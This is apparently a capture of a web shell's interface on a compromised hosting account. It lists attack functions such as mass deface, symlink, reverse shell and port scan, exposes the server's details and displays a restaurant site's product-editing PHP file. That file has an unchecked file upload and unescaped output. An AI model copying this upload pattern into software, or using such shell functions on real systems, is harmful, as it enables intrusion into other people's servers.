Tul xxx Tul
User / IP
:
216.73.216.95
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
invitados
/
condorburguer
/
admin
/
Viewing: update_product.php
<?php include '../components/connect.php'; session_start(); $admin_id = $_SESSION['admin_id']; if(!isset($admin_id)){ header('location:admin_login.php'); }; // Obtener categorías desde la base de datos $categories = $conn->query("SELECT c.* FROM categories c INNER JOIN products p ON c.id = p.category GROUP BY c.id, c.name ORDER BY c.name")->fetchAll(PDO::FETCH_ASSOC); if(isset($_POST['update'])){ $pid = $_POST['pid']; $pid = filter_var($pid, FILTER_SANITIZE_STRING); $name = $_POST['name']; $name = filter_var($name, FILTER_SANITIZE_STRING); $price = $_POST['price']; $price = filter_var($price, FILTER_SANITIZE_STRING); $price = number_format((float)str_replace(',', '.', $price), 2, '.', ''); $category = $_POST['category']; $category = filter_var($category, FILTER_SANITIZE_STRING); $description = $_POST['description']; $description = filter_var($description, FILTER_SANITIZE_STRING); if(isset($_POST['new_category']) && $_POST['new_category'] != '') { $new_category = trim($_POST['new_category']); $check_cat = $conn->prepare("SELECT id FROM categories WHERE name = ?"); $check_cat->execute([$new_category]); if($check_cat->rowCount() > 0) { $category_id = $check_cat->fetch(PDO::FETCH_ASSOC)['id']; } else { $insert_cat = $conn->prepare("INSERT INTO categories (name) VALUES (?)"); $insert_cat->execute([$new_category]); $category_id = $conn->lastInsertId(); } } else { $category_id = (int)$category; } $update_product = $conn->prepare("UPDATE `products` SET name = ?, category = ?, price = ?, description = ? WHERE id = ?"); $update_product->execute([$name, $category_id, $price, $description, $pid]); $message[] = 'Comida Actualizada!'; $old_image = $_POST['old_image']; $image = $_FILES['image']['name']; $image = filter_var($image, FILTER_SANITIZE_STRING); $image_size = $_FILES['image']['size']; $image_tmp_name = $_FILES['image']['tmp_name']; $image_folder = '../uploaded_img/'.$image; if(!empty($image)){ if($image_size > 2000000){ $message[] = 'La imágen es demasiado grande!'; }else{ $update_image = $conn->prepare("UPDATE `products` SET image = ? WHERE id = ?"); $update_image->execute([$image, $pid]); move_uploaded_file($image_tmp_name, $image_folder); unlink('../uploaded_img/'.$old_image); $message[] = 'Imágen actualizada!'; } } header('location:products.php'); exit(); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Actualizar Comida</title> <link rel="icon" href="../images/favicon.png" type="image/x-icon"> <!-- font awesome cdn link --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"> <!-- custom css file link --> <link rel="stylesheet" href="../css/admin_style.css"> </head> <body> <body style="background-image: url('../images/background1.png'); background-size: cover; background-position: center; background-repeat: no-repeat;"> <?php include '../components/admin_header.php' ?> <!-- update product section starts --> <section class="update-product"> <h1 class="heading">Actualizar Comida</h1> <?php $update_id = $_GET['update']; $show_products = $conn->prepare("SELECT * FROM `products` WHERE id = ?"); $show_products->execute([$update_id]); if($show_products->rowCount() > 0){ while($fetch_products = $show_products->fetch(PDO::FETCH_ASSOC)){ ?> <form action="" method="POST" enctype="multipart/form-data"> <input type="hidden" name="pid" value="<?= $fetch_products['id']; ?>"> <input type="hidden" name="old_image" value="<?= $fetch_products['image']; ?>"> <img src="../uploaded_img/<?= $fetch_products['image']; ?>" alt=""> <span>Nombre</span> <input type="text" required placeholder="enter product name" name="name" maxlength="100" class="box" value="<?= $fetch_products['name']; ?>"> <span>Precio</span> <input type="number" min="0" max="9999999999" step="0.01" required placeholder="enter product price" name="price" class="box" inputmode="decimal" pattern="^\\d+(\\.\\d{1,2})?$" value="<?= $fetch_products['price']; ?>"> <span>Seleccione Categoría</span> <select name="category" class="box" id="categorySelectForm" required onchange="toggleNewCategory(this)"> <option value="" disabled>Seleccione Categoría</option> <?php foreach($categories as $cat): ?> <option value="<?= $cat['id'] ?>" <?= $cat['id'] == $fetch_products['category'] ? 'selected' : '' ?>><?= htmlspecialchars($cat['name']) ?></option> <?php endforeach; ?> <option value="new">Nueva categoría...</option> </select> <input type="text" name="new_category" id="newCategoryInput" class="box" placeholder="Nombre de la nueva categoría" style="display:none;"> <span>Ingredientes</span> <textarea name="description" placeholder="Ingrese los ingredientes" class="box" maxlength="1000"><?= $fetch_products['description']; ?></textarea> <span>Imágen</span> <input type="file" name="image" class="box" accept="image/jpg, image/jpeg, image/png, image/webp"> <div class="flex-btn"> <input type="submit" value="Actualizar" class="btn" name="update"> <a href="products.php" class="option-btn">Regresar</a> </div> </form> <?php } }else{ echo '<p class="empty">no products added yet!</p>'; } ?> </section> <!-- update product section ends --> <!-- custom js file link --> <script src="../js/admin_script.js"></script> <script> function toggleNewCategory(sel) { var input = document.getElementById('newCategoryInput'); if(sel.value === 'new') { input.style.display = 'block'; input.required = true; } else { input.style.display = 'none'; input.required = false; } } </script> </body> </html>
Coded With 💗 by
0x6ick